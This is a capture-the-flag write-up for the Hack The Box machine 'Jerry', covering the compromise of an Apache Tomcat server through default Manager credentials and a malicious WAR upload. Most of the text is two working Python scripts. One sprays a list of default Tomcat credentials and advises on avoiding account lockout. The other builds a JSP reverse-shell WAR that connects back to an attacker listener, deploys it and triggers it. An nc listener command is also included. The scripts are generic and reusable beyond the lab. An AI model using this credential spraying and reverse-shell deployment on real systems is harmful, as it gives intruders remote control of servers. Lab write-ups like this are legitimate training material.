🕵 HTB-Writeup : JERRY

Recon
nmap
With nmap we find only one open port, 8080, which is running an Apache Tomcat server.
gobuster
With gobuster, we discover a few directories. /manager points to the Tomcat Manager application, and we are prompted for credentials as soon as we open the page.
Vulnerabilities
We try to connect to http://10.10.10.95:8080/manager/html and intercept the request in Burp.
We identify the header Authorization: Basic YWRtaW46Y291Y291. HTTP Basic authentication sends the credentials base64-encoded, not encrypted: this value decodes to admin:coucou, the guess we typed into the browser prompt. We then try to brute-force the authentication with default Tomcat credentials. I found a list on this GitHub.
Again in Burp, we send the request to Intruder and launch the attack with our payloads.

Setting the payload positions
One of the credential pairs works!

We get a response from one payload
We are able to log in to the manager page with those creds: tomcat:s3cret
More easily, it is possible to use the scanner/http/tomcat_mgr_login module in Metasploit, which tests the well-known default Tomcat Manager credentials for us.
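The same two steps, decoding the captured Basic header and spraying a list of default pairs against /manager/html, as a stdlib-only Python script. This is an added example, not code from the write-up or from the GitHub list it mentions; the credential list below is a short constructed one, and the target URL is the one from the write-up.

```python
"""Decode the Basic-auth header seen in Burp and spray default Tomcat Manager
credentials against /manager/html (stdlib only)."""
import base64
import urllib.error
import urllib.request
from typing import Callable, Iterable, Optional, Tuple

Cred = Tuple[str, str]


def decode_basic(header: str) -> Cred:
    """'Basic YWRtaW46Y291Y291' -> ('admin', 'coucou')."""
    scheme, _, token = header.strip().partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic authorization header")
    # The password may itself contain ':'; only the first one separates user and password.
    user, _, password = base64.b64decode(token).decode("utf-8", "replace").partition(":")
    return user, password


def basic_header(user: str, password: str) -> str:
    """Build the Authorization value Intruder sends for one guess."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


# Short, constructed list of well-known Tomcat Manager defaults; the GitHub
# list mentioned in the text is longer but has the same user:password shape.
DEFAULT_CREDS: Tuple[Cred, ...] = (
    ("admin", "admin"), ("admin", "tomcat"), ("admin", ""),
    ("tomcat", "tomcat"), ("tomcat", "s3cret"), ("role1", "role1"),
    ("both", "tomcat"), ("manager", "manager"),
)


def http_status(url: str, auth_header: str) -> int:
    """Live probe: HTTP status for one guess (urllib raises on 4xx/5xx)."""
    req = urllib.request.Request(url, headers={"Authorization": auth_header})
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def spray(url: str, creds: Iterable[Cred],
          probe: Callable[[str, str], int] = http_status) -> Optional[Tuple[str, str, int]]:
    """Try each pair in order and stop at the first that is not rejected with 401.

    Tomcat answers 401 for a wrong password, 403 for a valid account that lacks
    the manager-gui role, and 200 when the manager page renders; returning the
    status lets the caller tell those cases apart.
    """
    for user, password in creds:
        status = probe(url, basic_header(user, password))
        if status != 401:
            return user, password, status
    return None


if __name__ == "__main__":
    print(decode_basic("Basic YWRtaW46Y291Y291"))
    print(spray("http://10.10.10.95:8080/manager/html", DEFAULT_CREDS))
```

One caveat when running a long list: Tomcat's stock server.xml wraps the user database in a LockOutRealm (5 failures in 5 minutes lock the account for 300 s), so after enough bad guesses the correct pair also comes back as 401. Keep the list short and ordered by likelihood, and re-test a promising pair after the lockout window if it was queued late.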
Exploit
We are welcomed by the manager page, which includes a WAR file upload form.

Screenshot of the welcome page
Thanks to msfvenom, it is possible to build a malicious WAR file that spawns a reverse shell when Tomcat deploys and serves it. We first try the java/shell_reverse_tcp payload to build the WAR.
Then we upload the WAR file to the server, and the new application appears in the list.

Screenshot of applications list
We listen on port 4444 (nc -lvnp 4444) while browsing to the /pwn page we just uploaded.
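The three steps above (build the WAR, upload it, trigger it) written out by hand so the moving parts are visible, as an added example rather than the write-up's own commands. It rebuilds what the msfvenom WAR contains, a single JSP that connects back and pumps bytes between the socket and a cmd.exe child, using only the Python standard library. Two assumptions: the listener address 10.10.14.5 is a made-up VPN address, and the upload goes through the Manager text interface (PUT /manager/text/deploy), which needs the manager-script role, instead of the HTML form the write-up used.

```python
"""Build a JSP reverse-shell WAR with zipfile and deploy it through the Tomcat
Manager text interface (stdlib only)."""
import base64
import io
import urllib.request
import zipfile

# Attacker listener: a constructed VPN address, not taken from the write-up.
LHOST, LPORT = "10.10.14.5", 4444

# Single-threaded pump between the socket and the child shell. The whole body
# sits in try/catch because Thread.sleep throws a checked exception that the
# generated _jspService method does not declare.
JSP_TEMPLATE = r"""<%@ page import="java.io.*,java.net.*" %><%
try {
  Socket sock = new Socket("__LHOST__", __LPORT__);
  Process proc = Runtime.getRuntime().exec("__SHELL__");
  InputStream pi = proc.getInputStream(), pe = proc.getErrorStream(), si = sock.getInputStream();
  OutputStream po = proc.getOutputStream(), so = sock.getOutputStream();
  while (!sock.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush(); po.flush();
    Thread.sleep(50);
    try { proc.exitValue(); break; } catch (IllegalThreadStateException ignored) {}
  }
  proc.destroy(); sock.close();
} catch (Exception ignored) {}
%>"""

# Servlet 3.0 descriptor. index.jsp is already a Tomcat default welcome file,
# so GET /pwn/ runs it; the explicit entry just states the intent.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="3.0">
  <welcome-file-list><welcome-file>index.jsp</welcome-file></welcome-file-list>
</web-app>
"""


def build_war(lhost: str, lport: int, shell: str = "cmd.exe") -> bytes:
    """Return WAR bytes: WEB-INF/web.xml plus an index.jsp that calls back."""
    jsp = (JSP_TEMPLATE.replace("__LHOST__", lhost)
                       .replace("__LPORT__", str(lport))
                       .replace("__SHELL__", shell))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", WEB_XML)
        war.writestr("index.jsp", jsp)
    return buf.getvalue()


def war_entries(war: bytes) -> list:
    """Archive member names, to check what was built before uploading."""
    return zipfile.ZipFile(io.BytesIO(war)).namelist()


def war_read(war: bytes, name: str) -> str:
    """Contents of one archive member as text."""
    return zipfile.ZipFile(io.BytesIO(war)).read(name).decode()


def deploy_request(base: str, user: str, password: str, war: bytes,
                   path: str = "/pwn") -> urllib.request.Request:
    """PUT the WAR to /manager/text/deploy (assumes the manager-script role)."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return urllib.request.Request(
        f"{base}/manager/text/deploy?path={path}&update=true",
        data=war, method="PUT",
        headers={"Authorization": f"Basic {token}",
                 "Content-Type": "application/octet-stream"},
    )


if __name__ == "__main__":
    base = "http://10.10.10.95:8080"
    war = build_war(LHOST, LPORT)
    with urllib.request.urlopen(deploy_request(base, "tomcat", "s3cret", war)) as r:
        print(r.read().decode())  # Tomcat's OK/FAIL line for the deploy
    # Start `nc -lvnp 4444` first; this GET stays open while the shell is alive,
    # so a short timeout is expected and ignored.
    try:
        urllib.request.urlopen(f"{base}/pwn/", timeout=3)
    except Exception:
        pass
```

Because the JSP runs inside the Tomcat worker thread, the shell lives as long as the request does; if the listener is closed, the child cmd.exe keeps the request open until it exits, which is why the trigger uses a timeout. Undeploy with the manager's undeploy action when done so the application is not left behind.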
We get our first shell, and it is already an NT AUTHORITY\SYSTEM prompt: Tomcat runs as SYSTEM, so no privilege escalation is needed.
Both flags are on the Administrator desktop.
Tags
Easy, External, Tomcat, Penetration Tester Level 1, Remote Code Execution, A05:2021-Security Misconfiguration, Default Credentials, Malicious WAR File Upload